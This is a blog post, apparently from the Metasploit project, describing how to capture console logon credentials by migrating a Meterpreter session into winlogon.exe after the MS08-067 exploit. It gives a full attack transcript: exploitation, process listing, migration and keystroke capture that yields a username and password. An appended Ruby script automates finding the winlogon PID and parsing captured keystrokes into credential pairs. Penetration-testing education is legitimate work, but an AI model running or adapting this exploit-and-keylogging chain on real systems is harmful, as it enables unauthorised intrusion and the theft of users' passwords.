Posted by HDM
In my previous post, I described the keystroke sniffing capabilities of the Meterpreter payload. One of the key restrictions of this feature is that it can only sniff while running inside of a process with interactive access to the desktop. In the case of the MS08-067 exploit, we had to migrate into Explorer.exe in order to capture the logged-on user’s keystrokes.
While testing the keystroke sniffer, it occurred to me to migrate into the Winlogon.exe process instead. This process should have interactive access to the desktop; however, when I tried to sniff the active user's keystrokes this way, it was not successful. The reason is that Winlogon runs on its own secure desktop (the Winlogon desktop, where the logon UI and the Ctrl+Alt+Del sequence are handled), not on the logged-on user's Default desktop, so GetAsyncKeyState called from inside it only sees input directed at that desktop. Although Winlogon could not see the logged-on user's keystrokes this way, it can capture the username and password of anyone logging into the target's console. Note that winlogon.exe runs as SYSTEM, so migrating into it requires a SYSTEM-level session such as the one MS08-067 provides. The example below demonstrates this process:
msf exploit(ms08_067_netapi) > exploit
[*] Triggering the vulnerability…
[*] Sending stage (2650 bytes)
[*] Uploading DLL (75787 bytes)…
[*] Upload completed.
[*] Meterpreter session 1 opened
meterpreter > ps
Process list
============
 PID   Name          Path
 ---   ----          ----
 292   wscntfy.exe   C:\WINDOWS\system32\wscntfy.exe
 316   Explorer.EXE  C:\WINDOWS\Explorer.EXE
 356   smss.exe      \SystemRoot\System32\smss.exe
 416   csrss.exe     \??\C:\WINDOWS\system32\csrss.exe
 440   winlogon.exe  \??\C:\WINDOWS\system32\winlogon.exe
[ snip ]
meterpreter > migrate 440
[*] Migrating to 440…
[*] Migration completed successfully.
meterpreter > keyscan_start
Starting the keystroke sniffer…
[ wait for user login ]
meterpreter > keyscan_dump
Dumping captured keystrokes…
Administrator <Tab> s3cretp4ss <Return>
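The two manual steps above (reading the PID of winlogon.exe out of the `ps` listing, and reading a credential pair out of the `keyscan_dump` stream) are easy to get wrong on a busy host. The Ruby below is an added example, not code from the original post or from Metasploit: it parses a constructed copy of the `ps` output to find the process to migrate into, and splits a `keyscan_dump` stream into logon attempts, treating `<Return>` as the end of an attempt, `<Tab>` as the field separator, and any other bracketed token (modifier keys such as `<Shift>`) as non-printing. The sample strings are constructed to match the transcript; the token names other than `<Tab>` and `<Return>` are assumptions.

```ruby
# Added example (not from the original post or from Metasploit): pick the
# PID to migrate into from a Meterpreter `ps` listing, and turn the output
# of `keyscan_dump` into (username, password) pairs.

# Constructed `ps` output, matching the transcript above.
PS_OUTPUT = <<~PS
  Process list
  ============

   PID   Name          Path
   ---   ----          ----
   292   wscntfy.exe   C:\\WINDOWS\\system32\\wscntfy.exe
   316   Explorer.EXE  C:\\WINDOWS\\Explorer.EXE
   356   smss.exe      \\SystemRoot\\System32\\smss.exe
   416   csrss.exe     \\??\\C:\\WINDOWS\\system32\\csrss.exe
   440   winlogon.exe  \\??\\C:\\WINDOWS\\system32\\winlogon.exe
PS

# Constructed `keyscan_dump` output, matching the transcript above.
KEYSCAN_OUTPUT = "Administrator <Tab> s3cretp4ss <Return>"

# Returns the PID of the first process whose name matches `name`
# (case-insensitive, as Windows itself treats image names), or nil if the
# process is not running. Header and separator lines have no numeric PID
# and are skipped.
def find_pid(ps_text, name)
  ps_text.each_line do |line|
    pid, pname = line.strip.split(/\s+/, 3)
    next unless pid && pname && pid.match?(/\A\d+\z/)
    return pid.to_i if pname.casecmp?(name)
  end
  nil
end

# Splits a keyscan_dump stream into logon attempts. Each <Return> ends an
# attempt; fields inside an attempt are separated by <Tab>; other bracketed
# tokens (assumed to be modifier keys such as <Shift>) are dropped.
# An attempt with no typed text (a bare <Return>) is ignored, and an attempt
# with a single field yields a nil password rather than echoing the user.
def parse_logons(dump)
  dump.split("<Return>").map do |attempt|
    fields = attempt.split("<Tab>").map { |f| f.gsub(/<[^>]+>/, "").strip }
    next if fields.all?(&:empty?)
    { user: fields.first, pass: (fields.size > 1 ? fields.last : nil) }
  end.compact
end

if __FILE__ == $PROGRAM_NAME
  pid = find_pid(PS_OUTPUT, "winlogon.exe")
  puts "migrate #{pid}" if pid
  parse_logons(KEYSCAN_OUTPUT).each do |l|
    puts "user=#{l[:user]} pass=#{l[:pass]}"
  end
end
```

On a host with more than one logon session there can be several winlogon.exe processes; `find_pid` returns the first one listed, so check the session before migrating if the `ps` output shows more than one.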